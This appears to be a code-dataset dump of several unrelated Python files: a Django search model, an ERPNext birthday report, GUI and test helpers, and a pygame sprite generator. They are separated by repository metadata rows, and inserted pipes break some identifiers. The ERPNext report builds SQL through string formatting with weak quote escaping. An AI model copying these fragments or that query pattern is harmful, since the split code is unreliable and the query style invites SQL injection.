from django.db import models
from django.utils.translation import ugettext as _
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode, smart_str
from .managers import RecentSearchManager
from .classes import SearchModel
class RecentSearch(models.Model):
"""
Keeps a list of the n most recent search keywords for a given user
"""
user = models.ForeignKey(User, verbose_name=_(u'user'), editable=False)
query = models.TextField(verbose_name=_(u'query'), editable=False)
datetime_created = models.DateTimeField(verbose_name=_(u'datetime created'), editable=False)
hits = models.IntegerField(verbose_name=_(u'hits'), editable=False)
objects = RecentSearchManager()
def __unicode__(self):
docu | ment_search = SearchModel.get('documents.Document')
query_dict = urlparse.parse_qs(urllib.unquote_plus(smart_str(self.query)))
if self.is_advanced():
# Advanced search
advanced_string = []
for key, value in query_dic | t.items():
search_field = document_search.get_search_field(key)
advanced_string.append(u'%s: %s' % (search_field.label, smart_unicode(' '.join(value))))
display_string = u', '.join(advanced_string)
else:
# Is a simple search
display_string = smart_unicode(' '.join(query_dict['q']))
return u'%s (%s)' % (display_string, self.hits)
def save(self, *args, **kwargs):
self.datetime_created = datetime.now()
super(RecentSearch, self).save(*args, **kwargs)
def url(self):
view = 'results' if self.is_advanced() else 'search'
return '%s?%s' % (reverse(view), self.query)
def is_advanced(self):
return 'q' not in urlparse.parse_qs(self.query)
class Meta:
ordering = ('-datetime_created',)
verbose_name = _(u'recent search')
verbose_name_plural = _(u'recent searches')
|
mhbu50/erpnext | erpnext/hr/report/employee_birthday/employee_birthday.py | Python | gpl-3.0 | 1,261 | 0.025377 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
def execute(filters=None):
if not filters: filters = {}
columns = get_columns()
data = get_employees(filters)
return columns, data
def get_columns():
return [
_("Employee") + ":Link/Employee:120", _("Name") + ":Data:200", _("Date of Birth")+ ":Date:100",
_("Branch") + ":Link/Branch:120", _("Department") + ":Link/Department:120",
_("Designation") + ":Link/Designation:120", _("Gender") + "::60", _("Company") + ":Link/Company:120"
]
def get_employees(filters):
conditions = get_conditions(filters)
return frappe.db.sql("""select name, employee_name, date_of_birth,
branch, department, designation,
gender, company from tabEmployee where status = 'Active' %s""" % conditions, as_list=1)
def get_conditions(filters):
conditions = ""
if filters.get("month"):
month = | ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov",
"Dec"].index(filters["month"]) + 1
con | ditions += " and month(date_of_birth) = '%s'" % month
if filters.get("company"): conditions += " and company = '%s'" % \
filters["company"].replace("'", "\\'")
return conditions
|
drogenlied/qudi | qtwidgets/plotwidget_modified.py | Python | gpl-3.0 | 3,362 | 0.001785 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This file contains the modified PlotWidget for Qudi.
Qudi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Qudi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Qudi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
from pyqtgraph import PlotWidget
from qtpy import QtCore
from qtpy import QtWidgets
class PlotWidgetModified(PlotWidget):
""" Extend the PlotWidget Class with more adjustment possibilities.
This class can be promoted in the Qt designer. Here you can predefine or
redefined all methods and class variables, which should be used in the
Qt Designer before it will be loaded into the created ui file.
This class behaves like the normal PlotWidget class but extends its
functionality with modified mouse events.
"""
sigMouseClick = QtCore.Signal(object)
sigMouseReleased = QtCore.Signal(object)
def __init__(self, *args, **kargs):
PlotWidget.__init__(self,**kargs)
def mousePressEvent(self, ev):
""" Override the Qt method, which handels mouse press events.
@param QEvent ev: Event object which contains all the information at
the time the event was emitted.
That is basically a reimplementation of the mouseReleaseEvent function
of the PlotWidget.
"""
# Extend | the received event ev with all the properties of a Qt mouse
# press event.
QtWidgets.QGraphicsView.mousePressEvent(self, ev)
# this signal will be catched by othe | r methods if the mouse was clicked
# inside the PlotWidget.
self.sigMouseClick.emit(ev)
if not self.mouseEnabled:
return
self.mousePressPos = ev.pos()
self.clickAccepted = ev.isAccepted()
if not self.clickAccepted:
self.scene().clearSelection()
return ## Everything below disabled for now.
def mouseReleaseEvent(self, ev):
""" Override the Qt method, which handels mouse release events.
@param QEvent ev: Event object which contains all the information at
the time the event was emitted.
That is basically a reimplementation of the mouseReleaseEvent function
of the PlotWidget.
"""
# Extend the received event ev with all the properties of a Qt mouse
# press event.
QtWidgets.QGraphicsView.mouseReleaseEvent(self, ev)
# this signal will be catched by other methods if the mouse was clicked
# and afterwards release inside the PlotWidget.
self.sigMouseReleased.emit(ev)
if not self.mouseEnabled:
return
self.lastButtonReleased = ev.button()
return ## Everything below disabled for now.
|
autostack/pytest-ansible | pytest_ansible/node.py | Python | mit | 1,681 | 0 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from pytest_ansible.utils import memoize
import threading
import os
class Facts(dict):
PREF = 'ansible_'
def __getattr__(self, attr):
try:
data = self[attr]
except KeyError:
if attr.startswith(self.PREF):
raise
attr = '{}{}'.format(self.PREF, attr)
data = getattr(self, attr)
if isinstance(data, dict):
data = Facts(data)
return data
class Node(object):
def __init__(self, name, inventory):
self._name = name
self._inventory = inventory
self._facts = None
def __repr__(self):
repr_template = ("<{0.__class__.__module__}.{0.__class__.__name__}"
" object at {1} | name {2}>")
return repr_template.format(self, hex(id(self)), self.name)
def _load_setup(self, data):
print('node thread id is', threading.currentThread(), os.getpid())
self._facts = Facts(data['ansible_facts'])
@property
def facts(self):
return self._facts
@property
def vars(self):
return self.inventory.get_host(self._name).vars
@propert | y
def name(self):
return self._name
@property
def inventory(self):
return self._inventory
@memoize
def get_node(name, inventory):
'''
Generating Node object base on given ansible host instance
:param name: host name
:param inventory: inventory manager instance
:return: Node()
'''
| return Node(name, inventory)
|
171121130/SWI | venv/Lib/site-packages/openpyxl/cell/__init__.py | Python | mit | 149 | 0 | from __future__ import absolute_import
# | Copyright (c) 2010-2017 openpyxl
from .cell import Cell, WriteOnlyCell
from .read_only import ReadOnlyCell
| |
Penaz91/Glitch_Heaven | Game/libs/lasergen.py | Python | mit | 1,000 | 0.002 | # Laser Generator Library
# Part of the Glitch_Heaven Project
# Copyright 2015-2016 Penaz <penazarea@altervista.org>
import pygame
from os.path import join as pjoin
def generate(size, vertical=False, image=None):
if image is Non | e:
graphics = pygame.image.load(pjoin("resources", "sprites", "laser.png")).convert_alpha()
else:
graphics = image
if vertical:
plat = pygame.surface.Surface((32, size), pygame.SRCALPHA, 32)
graphics = pygame.transform.rotate(graphics, 90)
for i in | range(0, size, 32):
plat.blit(graphics, (0, i))
else:
plat = pygame.surface.Surface((size, 32), pygame.SRCALPHA, 32)
for i in range(0, size, 32):
plat.blit(graphics, (i, 0))
return plat.convert_alpha()
if __name__ == "__main__":
pygame.init()
screen = pygame.display.set_mode((800, 600))
platform = generate(160, True)
while True:
screen.blit(platform, (50, 50))
pygame.display.update()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.